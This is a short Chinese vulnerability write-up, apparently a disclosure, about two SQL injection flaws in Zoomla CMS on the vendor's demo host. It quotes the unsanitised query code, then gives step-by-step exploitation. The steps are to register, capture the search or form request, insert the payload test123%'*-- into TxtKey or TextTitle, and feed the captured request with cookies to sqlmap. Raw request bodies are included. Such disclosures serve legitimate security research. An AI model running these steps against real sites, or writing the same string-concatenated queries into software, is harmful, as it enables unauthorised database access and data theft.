注入1:
http://demo.zoomla.cn/mis/target/page.aspx
TxtKey参数
[php]
string selectedValue = this.drType.SelectedValue;
string text = this.TxtKey.Text;
this.dt = this.bll.Sel(string.Concat(new string[]
{
"ParentID=0 And Inputer='",
this.buser.GetLogin().UserName,
"' And type like '%",
selectedValue,
"%' And Title like '%",
text, //没有过滤直接带入查询,导致漏洞产生
"%'"
}), "ID desc");
[/php]
前台注册一个用户。
先到http://demo.zoomla.cn/mis/target/AddTarget.aspx
添加一个名为test123的目标
访问下面的链接:
http://demo.zoomla.cn/mis/target/page.aspx
搜索test123
抓取数据包,把test123修改为test123%’*--
[php]
__VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2
[/php]
连着cookie丢到sqlmap即可:
注入点2:
http://demo.zoomla.cn/mis/addmis.aspx
title参数
[php]
protected void Button_Click(object sender, EventArgs e)
…
DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); //title参数存在注入的问题。没有过滤
…[/php]
随便输入点信息:
点击确定,然后抓包
[php]
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID=
[/php]
TextTitle=aaa 存在注入
带上COOKIE丢到sqlmap即可
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论